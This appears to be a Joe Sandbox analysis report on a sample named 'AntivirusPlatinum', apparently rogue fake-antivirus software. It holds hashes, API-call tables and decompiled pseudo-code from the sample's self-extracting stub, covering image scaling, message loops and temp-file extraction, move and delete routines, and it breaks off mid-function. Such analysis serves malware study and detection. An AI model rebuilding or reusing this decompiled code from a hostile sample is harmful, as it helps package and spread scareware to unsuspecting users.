                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Show$DestroyParent$CreateInitializePointsRectTextUpdate
                                                                                                                                                  • String ID: RarHtmlClassName
                                                                                                                                                  • API String ID: 2853670363-1658105358
                                                                                                                                                  • Opcode ID: 847cbe9744d6f9c96df690b184ecb2e54258959ff2f53691c322438f891e790a
                                                                                                                                                  • Instruction ID: a00efe7b2d33d11f981a855a221e61759c6655e01f9ee02c7d4733981d41992d
                                                                                                                                                  • Opcode Fuzzy Hash: 847cbe9744d6f9c96df690b184ecb2e54258959ff2f53691c322438f891e790a
                                                                                                                                                  • Instruction Fuzzy Hash: DE41C570600704BFDB21AF65DD49FAF7BA9EF44700F01852AF856E2291CB789920CB69
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                  			E0040ABDC(void* _a4, signed int _a8, int _a12) {
                                                                                                                                                  				struct HDC__* _v8;
                                                                                                                                                  				struct HDC__* _v12;
                                                                                                                                                  				struct HBITMAP__* _v16;
                                                                                                                                                  				void* _v20;
                                                                                                                                                  				signed int _v36;
                                                                                                                                                  				signed int _v40;
                                                                                                                                                  				void _v44;
                                                                                                                                                  				struct HDC__* _t36;
                                                                                                                                                  				signed int _t43;
                                                                                                                                                  				struct HDC__* _t54;
                                                                                                                                                  
                                                                                                                                                  				_t36 = GetDC(0);
                                                                                                                                                  				_v12 = _t36;
                                                                                                                                                  				_t54 = CreateCompatibleDC(_t36);
                                                                                                                                                  				_v8 = CreateCompatibleDC(_v12);
                                                                                                                                                  				GetObjectA(_a4, 0x18,  &_v44);
                                                                                                                                                  				asm("cdq");
                                                                                                                                                  				_t43 = _v36 * _a8 / _v40;
                                                                                                                                                  				if(_t43 < _a12) {
                                                                                                                                                  					_a12 = _t43;
                                                                                                                                                  				}
                                                                                                                                                  				_v16 = CreateCompatibleBitmap(_v12, _a8, _a12);
                                                                                                                                                  				_a4 = SelectObject(_t54, _a4);
                                                                                                                                                  				_v20 = SelectObject(_v8, _v16);
                                                                                                                                                  				StretchBlt(_v8, 0, 0, _a8, _a12, _t54, 0, 0, _v40, _v36, 0xcc0020);
                                                                                                                                                  				SelectObject(_t54, _a4);
                                                                                                                                                  				SelectObject(_v8, _v20);
                                                                                                                                                  				DeleteDC(_t54);
                                                                                                                                                  				DeleteDC(_v8);
                                                                                                                                                  				ReleaseDC(0, _v12);
                                                                                                                                                  				return _v16;
                                                                                                                                                  			}













                                                                                                                                                  0x0040abe8
                                                                                                                                                  0x0040abf5
                                                                                                                                                  0x0040abfd
                                                                                                                                                  0x0040ac01
                                                                                                                                                  0x0040ac0d
                                                                                                                                                  0x0040ac1a
                                                                                                                                                  0x0040ac1b
                                                                                                                                                  0x0040ac21
                                                                                                                                                  0x0040ac23
                                                                                                                                                  0x0040ac23
                                                                                                                                                  0x0040ac3f
                                                                                                                                                  0x0040ac47
                                                                                                                                                  0x0040ac57
                                                                                                                                                  0x0040ac6b
                                                                                                                                                  0x0040ac75
                                                                                                                                                  0x0040ac7d
                                                                                                                                                  0x0040ac86
                                                                                                                                                  0x0040ac8b
                                                                                                                                                  0x0040ac91
                                                                                                                                                  0x0040ac9e

                                                                                                                                                  APIs
                                                                                                                                                  • GetDC.USER32(00000000), ref: 0040ABE8
                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0040ABF8
                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0040ABFF
                                                                                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0040AC0D
                                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 0040AC2F
                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0040AC42
                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0040AC4D
                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040AC6B
                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0040AC75
                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0040AC7D
                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0040AC86
                                                                                                                                                  • DeleteDC.GDI32(?), ref: 0040AC8B
                                                                                                                                                  • ReleaseDC.USER32 ref: 0040AC91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Object$Select$CompatibleCreate$Delete$BitmapReleaseStretch
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3950507155-0
                                                                                                                                                  • Opcode ID: 629bea9404d9b5a6bf81915325d9dfd7339313f3d0e0db77c6006f5bcc1e4a8d
                                                                                                                                                  • Instruction ID: 49fe361b3f63de033719242860511c57cf4e76dfbbd86f1750afdf69dbc3ac75
                                                                                                                                                  • Opcode Fuzzy Hash: 629bea9404d9b5a6bf81915325d9dfd7339313f3d0e0db77c6006f5bcc1e4a8d
                                                                                                                                                  • Instruction Fuzzy Hash: 1F21A276800258FFCF119FA1DD48CDEBFBAFB49350B108466FA14A2120C7759A60EFA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040BA36(void* __edx, void* __eflags, signed int _a4) {
                                                                                                                                                  				struct HWND__* _v8;
                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				void _v32;
                                                                                                                                                  				char _v1056;
                                                                                                                                                  				void* _t14;
                                                                                                                                                  				struct HWND__* _t15;
                                                                                                                                                  				int _t25;
                                                                                                                                                  				struct HWND__* _t35;
                                                                                                                                                  				void* _t39;
                                                                                                                                                  				void* _t47;
                                                                                                                                                  
                                                                                                                                                  				_t14 = E0040AD27(__eflags);
                                                                                                                                                  				if(_t14 == 0) {
                                                                                                                                                  					return _t14;
                                                                                                                                                  				}
                                                                                                                                                  				_t15 = GetWindow(_a4, 5);
                                                                                                                                                  				_a4 = _a4 & 0x00000000;
                                                                                                                                                  				_t35 = _t15;
                                                                                                                                                  				_v8 = _t35;
                                                                                                                                                  				if(_t35 == 0) {
                                                                                                                                                  					L12:
                                                                                                                                                  					return _t15;
                                                                                                                                                  				} else {
                                                                                                                                                  					while(_a4 < 0x200) {
                                                                                                                                                  						GetClassNameA(_t35,  &_v1056, 0x400);
                                                                                                                                                  						if(E0040DA54( &_v1056, "STATIC") == 0 && (GetWindowLongA(_t35, 0xfffffff0) & 0x0000001f) == 0xe) {
                                                                                                                                                  							_t39 = SendMessageA(_t35, 0x173, 0, 0);
                                                                                                                                                  							if(_t39 != 0) {
                                                                                                                                                  								GetObjectA(_t39, 0x18,  &_v32);
                                                                                                                                                  								_t25 = E0040ACE4(_v24);
                                                                                                                                                  								SendMessageA(_t35, 0x172, 0, E0040ABDC(_t39, E0040ACA1(_v28), _t25));
                                                                                                                                                  								_t47 = _t39 -  *0x4192d0; // 0x5d050a36
                                                                                                                                                  								if(_t47 != 0) {
                                                                                                                                                  									DeleteObject(_t39);
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_t15 = GetWindow(_t35, 2);
                                                                                                                                                  						_t35 = _t15;
                                                                                                                                                  						if(_t35 != _v8) {
                                                                                                                                                  							_a4 =  &(_a4->i);
                                                                                                                                                  							if(_t35 != 0) {
                                                                                                                                                  								continue;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					goto L12;
                                                                                                                                                  				}
                                                                                                                                                  			}














                                                                                                                                                  0x0040ba3f
                                                                                                                                                  0x0040ba46
                                                                                                                                                  0x0040bb26
                                                                                                                                                  0x0040bb26
                                                                                                                                                  0x0040ba52
                                                                                                                                                  0x0040ba58
                                                                                                                                                  0x0040ba5c
                                                                                                                                                  0x0040ba5e
                                                                                                                                                  0x0040ba63
                                                                                                                                                  0x0040bb24
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ba69
                                                                                                                                                  0x0040ba71
                                                                                                                                                  0x0040ba8b
                                                                                                                                                  0x0040baa4
                                                                                                                                                  0x0040bac2
                                                                                                                                                  0x0040bac6
                                                                                                                                                  0x0040bacf
                                                                                                                                                  0x0040bad8
                                                                                                                                                  0x0040baf6
                                                                                                                                                  0x0040baf8
                                                                                                                                                  0x0040bafe
                                                                                                                                                  0x0040bb01
                                                                                                                                                  0x0040bb01
                                                                                                                                                  0x0040bafe
                                                                                                                                                  0x0040bac6
                                                                                                                                                  0x0040bb0a
                                                                                                                                                  0x0040bb10
                                                                                                                                                  0x0040bb15
                                                                                                                                                  0x0040bb17
                                                                                                                                                  0x0040bb1c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bb1c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bb15
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bb23

                                                                                                                                                  APIs
                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 0040BA52
                                                                                                                                                  • GetClassNameA.USER32(00000000,?,00000400), ref: 0040BA8B
                                                                                                                                                    • Part of subcall function 0040DA54: CompareStringA.KERNEL32(00000400,00001001,0040BAA2,000000FF,?,000000FF,0040BAA2,?,STATIC), ref: 0040DA6A
                                                                                                                                                  • GetWindowLongA.USER32 ref: 0040BAA9
                                                                                                                                                  • SendMessageA.USER32(00000000,00000173,00000000,00000000), ref: 0040BAC0
                                                                                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 0040BACF
                                                                                                                                                    • Part of subcall function 0040ACE4: GetDC.USER32(00000000), ref: 0040ACF0
                                                                                                                                                    • Part of subcall function 0040ACE4: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040ACFF
                                                                                                                                                    • Part of subcall function 0040ACE4: ReleaseDC.USER32 ref: 0040AD0D
                                                                                                                                                    • Part of subcall function 0040ACA1: GetDC.USER32(00000000), ref: 0040ACAD
                                                                                                                                                    • Part of subcall function 0040ACA1: GetDeviceCaps.GDI32(00000000,00000058), ref: 0040ACBC
                                                                                                                                                    • Part of subcall function 0040ACA1: ReleaseDC.USER32 ref: 0040ACCA
                                                                                                                                                    • Part of subcall function 0040ABDC: GetDC.USER32(00000000), ref: 0040ABE8
                                                                                                                                                    • Part of subcall function 0040ABDC: CreateCompatibleDC.GDI32(00000000), ref: 0040ABF8
                                                                                                                                                    • Part of subcall function 0040ABDC: CreateCompatibleDC.GDI32(?), ref: 0040ABFF
                                                                                                                                                    • Part of subcall function 0040ABDC: GetObjectA.GDI32(?,00000018,?), ref: 0040AC0D
                                                                                                                                                    • Part of subcall function 0040ABDC: CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 0040AC2F
                                                                                                                                                    • Part of subcall function 0040ABDC: SelectObject.GDI32(00000000,?), ref: 0040AC42
                                                                                                                                                    • Part of subcall function 0040ABDC: SelectObject.GDI32(?,00000000), ref: 0040AC4D
                                                                                                                                                    • Part of subcall function 0040ABDC: StretchBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040AC6B
                                                                                                                                                    • Part of subcall function 0040ABDC: SelectObject.GDI32(00000000,?), ref: 0040AC75
                                                                                                                                                    • Part of subcall function 0040ABDC: SelectObject.GDI32(?,?), ref: 0040AC7D
                                                                                                                                                    • Part of subcall function 0040ABDC: DeleteDC.GDI32(00000000), ref: 0040AC86
                                                                                                                                                    • Part of subcall function 0040ABDC: DeleteDC.GDI32(?), ref: 0040AC8B
                                                                                                                                                    • Part of subcall function 0040ABDC: ReleaseDC.USER32 ref: 0040AC91
                                                                                                                                                  • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BAF6
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0040BB01
                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 0040BB0A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Object$Select$CompatibleCreateDeleteReleaseWindow$CapsDeviceMessageSend$BitmapClassCompareLongNameStretchString
                                                                                                                                                  • String ID: STATIC
                                                                                                                                                  • API String ID: 1367540300-1882779555
                                                                                                                                                  • Opcode ID: 677bcef28c02b9025152f1654d38757b0e1f9e66b029602011c5aca648503118
                                                                                                                                                  • Instruction ID: 07f9587c200ef160eeb3ad195d6a3061ef833dedfa1007c32b69e14aeef2bfc0
                                                                                                                                                  • Opcode Fuzzy Hash: 677bcef28c02b9025152f1654d38757b0e1f9e66b029602011c5aca648503118
                                                                                                                                                  • Instruction Fuzzy Hash: 4521AF32540604BBDB11AB60CD86FFF7A78EB45704F108136FA00B61D5DB78A952D6AD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                  			E004066B3(intOrPtr __ecx) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				char _v16;
                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                  				short _v32;
                                                                                                                                                  				struct tagMSG _v60;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  				intOrPtr* _t25;
                                                                                                                                                  				short _t28;
                                                                                                                                                  				intOrPtr* _t30;
                                                                                                                                                  
                                                                                                                                                  				_v12 = __ecx;
                                                                                                                                                  				_v8 = GetTickCount();
                                                                                                                                                  				_t23 = GetTickCount() - _v8;
                                                                                                                                                  				while(_t23 <= 0x2710) {
                                                                                                                                                  					_t25 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                  					 *((intOrPtr*)( *_t25 + 0xe0))(_t25,  &_v16);
                                                                                                                                                  					if(_v16 != 4) {
                                                                                                                                                  						if(PeekMessageA( &_v60, 0, 0, 0, 0) != 0) {
                                                                                                                                                  							TranslateMessage( &_v60);
                                                                                                                                                  							DispatchMessageA( &_v60);
                                                                                                                                                  							GetMessageA( &_v60, 0, 0, 0);
                                                                                                                                                  						}
                                                                                                                                                  						_t23 = GetTickCount() - _v8;
                                                                                                                                                  						continue;
                                                                                                                                                  					}
                                                                                                                                                  					break;
                                                                                                                                                  				}
                                                                                                                                                  				__imp__#8( &_v32);
                                                                                                                                                  				_t28 = 3;
                                                                                                                                                  				_v32 = _t28;
                                                                                                                                                  				_t30 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                  				_v24 = 0x96;
                                                                                                                                                  				return  *((intOrPtr*)( *_t30 + 0xd8))(_t30, 0x3f, 2,  &_v32, 0);
                                                                                                                                                  			}













                                                                                                                                                  0x004066c2
                                                                                                                                                  0x004066c7
                                                                                                                                                  0x004066cc
                                                                                                                                                  0x00406729
                                                                                                                                                  0x004066db
                                                                                                                                                  0x004066e5
                                                                                                                                                  0x004066ef
                                                                                                                                                  0x00406701
                                                                                                                                                  0x00406707
                                                                                                                                                  0x00406711
                                                                                                                                                  0x0040671e
                                                                                                                                                  0x0040671e
                                                                                                                                                  0x00406726
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406726
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004066ef
                                                                                                                                                  0x00406731
                                                                                                                                                  0x00406739
                                                                                                                                                  0x0040673f
                                                                                                                                                  0x00406746
                                                                                                                                                  0x0040674d
                                                                                                                                                  0x00406761

                                                                                                                                                  APIs
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 004066C5
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 004066CA
                                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004066F9
                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00406707
                                                                                                                                                  • DispatchMessageA.USER32 ref: 00406711
                                                                                                                                                  • GetMessageA.USER32 ref: 0040671E
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00406724
                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00406731
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$CountTick$DispatchInitPeekTranslateVariant
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4242828014-0
                                                                                                                                                  • Opcode ID: 766a9df9442bdbeba9f0a7bc8735e7438eb22f29082fd7e0e4a68b4f8cac5761
                                                                                                                                                  • Instruction ID: c0585beae235016d48584d35ef6264e879dc9a629979c78930dffb86ffc294e5
                                                                                                                                                  • Opcode Fuzzy Hash: 766a9df9442bdbeba9f0a7bc8735e7438eb22f29082fd7e0e4a68b4f8cac5761
                                                                                                                                                  • Instruction Fuzzy Hash: 2521F7B1D00209AFDB00DBE4D988DEEBBBCEF48354F148866F106E7250D7789A45CB60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                  			E0040C5B9(void* __edi, void* __esi) {
                                                                                                                                                  				intOrPtr _t231;
                                                                                                                                                  				void* _t232;
                                                                                                                                                  				void* _t307;
                                                                                                                                                  				void* _t309;
                                                                                                                                                  
                                                                                                                                                  				L0:
                                                                                                                                                  				while(1) {
                                                                                                                                                  					L0:
                                                                                                                                                  					_t307 = __esi;
                                                                                                                                                  					if( *((intOrPtr*)(_t309 + 0x10)) != 1) {
                                                                                                                                                  						goto L103;
                                                                                                                                                  					}
                                                                                                                                                  					L88:
                                                                                                                                                  					__ebp - 0xc34 = GetTempPathA(0x400, __ebp - 0xc34);
                                                                                                                                                  					__ebp - 0xc34 = E004076C8(__ebp - 0xc34);
                                                                                                                                                  					 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                                                                                                                                                  					_push(0);
                                                                                                                                                  					__ebx = "%s%s%d";
                                                                                                                                                  					while(1) {
                                                                                                                                                  						L90:
                                                                                                                                                  						__eax = __ebp - 0xc34;
                                                                                                                                                  						__eax = __ebp - 0x834;
                                                                                                                                                  						__eax =  *__edi(__ebp - 0x834, __ebx, __ebp - 0xc34,  *0x41409c);
                                                                                                                                                  						__esp = __esp + 0x14;
                                                                                                                                                  						__eax = __ebp - 0x834;
                                                                                                                                                  						__eax = __esi->i(__ebp - 0x834);
                                                                                                                                                  						if(__eax == 0xffffffff) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						L89:
                                                                                                                                                  						_t127 = __ebp - 4;
                                                                                                                                                  						 *_t127 =  *(__ebp - 4) + 1;
                                                                                                                                                  						_push( *(__ebp - 4));
                                                                                                                                                  					}
                                                                                                                                                  					L91:
                                                                                                                                                  					__ebp - 0x834 = SetDlgItemTextA( *(__ebp + 8), 0x65, __ebp - 0x834);
                                                                                                                                                  					if( *(__ebp - 0x1c34) == 0) {
                                                                                                                                                  						while(1) {
                                                                                                                                                  							L152:
                                                                                                                                                  							_t231 = E0040B613(0x1000, _t307,  *((intOrPtr*)(_t309 + 0xc)), _t309 - 0x54dc, _t309 - 0x1c34, _t309 - 5, _t309 + 0xf);
                                                                                                                                                  							 *((intOrPtr*)(_t309 + 0xc)) = _t231;
                                                                                                                                                  							if(_t231 != 0) {
                                                                                                                                                  								_t307 = GetFileAttributesA;
                                                                                                                                                  								_t232 = _t309 - 0x1c34;
                                                                                                                                                  								 *(_t309 - 4) = _t309 - 0xb4dc;
                                                                                                                                                  								 *((intOrPtr*)(_t309 - 0xc)) = 6;
                                                                                                                                                  								goto L2;
                                                                                                                                                  							} else {
                                                                                                                                                  								break;
                                                                                                                                                  							}
                                                                                                                                                  							L4:
                                                                                                                                                  							while(lstrcmpiA(_t309 - 0x54dc,  *(0x4140b8 +  *(_t309 - 4) * 4)) != 0) {
                                                                                                                                                  								 *(_t309 - 4) =  *(_t309 - 4) + 1;
                                                                                                                                                  								if( *(_t309 - 4) < 0xd) {
                                                                                                                                                  									continue;
                                                                                                                                                  								} else {
                                                                                                                                                  									goto L152;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							if( *(_t309 - 4) > 0xc) {
                                                                                                                                                  								continue;
                                                                                                                                                  							}
                                                                                                                                                  							L8:
                                                                                                                                                  							switch( *((intOrPtr*)( *(_t309 - 4) * 4 +  &M0040CA61))) {
                                                                                                                                                  								case 0:
                                                                                                                                                  									L9:
                                                                                                                                                  									__eflags =  *((intOrPtr*)(_t309 + 0x10)) - 2;
                                                                                                                                                  									if( *((intOrPtr*)(_t309 + 0x10)) != 2) {
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L10:
                                                                                                                                                  									GetCurrentDirectoryA(0x400, _t309 - 0x434);
                                                                                                                                                  									E0040A477(_t309 - 0xc34, _t309 - 0x434);
                                                                                                                                                  									E004076C8(_t309 - 0xc34);
                                                                                                                                                  									E0040A5E2(_t309 - 0xc34, _t309 - 0x1c34);
                                                                                                                                                  									E00405BAD(_t309 - 0x40dc);
                                                                                                                                                  									E00405BDD(_t309 - 0x40dc, _t309 - 0xc34);
                                                                                                                                                  									E00403556(_t309 - 0x30d4);
                                                                                                                                                  									_push(0);
                                                                                                                                                  									_t300 = _t309 - 0x40dc;
                                                                                                                                                  									_t252 = E00405FAD(_t309 - 0x40dc, _t302, _t309 - 0x30d4);
                                                                                                                                                  									__eflags = _t252;
                                                                                                                                                  									if(_t252 == 0) {
                                                                                                                                                  										L27:
                                                                                                                                                  										E00405BCA(_t309 - 0x40dc);
                                                                                                                                                  										goto L152;
                                                                                                                                                  									} else {
                                                                                                                                                  										_t295 = "%s.%d.tmp";
                                                                                                                                                  										do {
                                                                                                                                                  											L12:
                                                                                                                                                  											SetFileAttributesA(_t309 - 0x30d4, 0);
                                                                                                                                                  											__eflags =  *((char*)(_t309 - 0x24c4));
                                                                                                                                                  											if( *((char*)(_t309 - 0x24c4)) == 0) {
                                                                                                                                                  												L18:
                                                                                                                                                  												_t257 = GetFileAttributesA(_t309 - 0x30d4);
                                                                                                                                                  												__eflags = _t257 - 0xffffffff;
                                                                                                                                                  												if(_t257 == 0xffffffff) {
                                                                                                                                                  													goto L26;
                                                                                                                                                  												}
                                                                                                                                                  												L19:
                                                                                                                                                  												_t261 = DeleteFileA(_t309 - 0x30d4);
                                                                                                                                                  												__eflags = _t261;
                                                                                                                                                  												if(_t261 != 0) {
                                                                                                                                                  													goto L26;
                                                                                                                                                  												} else {
                                                                                                                                                  													 *(_t309 - 4) =  *(_t309 - 4) & _t261;
                                                                                                                                                  													_push(_t261);
                                                                                                                                                  													goto L22;
                                                                                                                                                  													L22:
                                                                                                                                                  													wsprintfA(_t309 - 0x834, _t295, _t309 - 0x30d4);
                                                                                                                                                  													_t311 = _t311 + 0x10;
                                                                                                                                                  													_t266 = GetFileAttributesA(_t309 - 0x834);
                                                                                                                                                  													__eflags = _t266 - 0xffffffff;
                                                                                                                                                  													if(_t266 != 0xffffffff) {
                                                                                                                                                  														_t60 = _t309 - 4;
                                                                                                                                                  														 *_t60 =  *(_t309 - 4) + 1;
                                                                                                                                                  														__eflags =  *_t60;
                                                                                                                                                  														_push( *(_t309 - 4));
                                                                                                                                                  														goto L22;
                                                                                                                                                  													} else {
                                                                                                                                                  														_t269 = MoveFileA(_t309 - 0x30d4, _t309 - 0x834);
                                                                                                                                                  														__eflags = _t269;
                                                                                                                                                  														if(_t269 != 0) {
                                                                                                                                                  															_t270 = E00406EA5();
                                                                                                                                                  															__eflags = _t270;
                                                                                                                                                  															if(_t270 != 0) {
                                                                                                                                                  																MoveFileExA(_t309 - 0x834, 0, 4);
                                                                                                                                                  															}
                                                                                                                                                  														}
                                                                                                                                                  														goto L26;
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											L13:
                                                                                                                                                  											__eflags = E00406EA5() - 4;
                                                                                                                                                  											if(__eflags == 0) {
                                                                                                                                                  												goto L18;
                                                                                                                                                  											}
                                                                                                                                                  											L14:
                                                                                                                                                  											E00407300(_t300, __eflags, _t309 - 0x434, _t309 - 0x2034);
                                                                                                                                                  											E004076C8(_t309 - 0x2034);
                                                                                                                                                  											_t280 = E0040A384(_t300, _t309 - 0x434);
                                                                                                                                                  											 *((intOrPtr*)(_t309 - 0xc)) = _t280;
                                                                                                                                                  											__eflags = _t280 - 4;
                                                                                                                                                  											if(_t280 < 4) {
                                                                                                                                                  												L16:
                                                                                                                                                  												_t282 = E00407279(_t300, _t309 - 0x1c34, 0);
                                                                                                                                                  												__eflags = _t282;
                                                                                                                                                  												if(_t282 != 0) {
                                                                                                                                                  													goto L27;
                                                                                                                                                  												}
                                                                                                                                                  												L17:
                                                                                                                                                  												 *((char*)(_t309 + E0040A384(_t300, _t309 - 0x30d4) - 0x30d3)) = 0;
                                                                                                                                                  												E0040A289(_t300, _t309 - 0x34, 0, 0x1e);
                                                                                                                                                  												_push(0x14);
                                                                                                                                                  												_pop(_t287);
                                                                                                                                                  												 *((short*)(_t309 - 0x24)) = _t287;
                                                                                                                                                  												 *((intOrPtr*)(_t309 - 0x2c)) = _t309 - 0x30d4;
                                                                                                                                                  												 *((intOrPtr*)(_t309 - 0x30)) = 3;
                                                                                                                                                  												SHFileOperationA(_t309 - 0x34);
                                                                                                                                                  												goto L18;
                                                                                                                                                  											}
                                                                                                                                                  											L15:
                                                                                                                                                  											_t292 = E0040A384(_t300, _t309 - 0x2034);
                                                                                                                                                  											__eflags =  *((intOrPtr*)(_t309 - 0xc)) - _t292;
                                                                                                                                                  											if( *((intOrPtr*)(_t309 - 0xc)) > _t292) {
                                                                                                                                                  												goto L17;
                                                                                                                                                  											}
                                                                                                                                                  											goto L16;
                                                                                                                                                  											L26:
                                                                                                                                                  											_push(0);
                                                                                                                                                  											_t300 = _t309 - 0x40dc;
                                                                                                                                                  											_t259 = E00405FAD(_t309 - 0x40dc, _t302, _t309 - 0x30d4);
                                                                                                                                                  											__eflags = _t259;
                                                                                                                                                  										} while (_t259 != 0);
                                                                                                                                                  										goto L27;
                                                                                                                                                  									}
                                                                                                                                                  								case 1:
                                                                                                                                                  									L28:
                                                                                                                                                  									__eflags =  *(__ebp + 0x10);
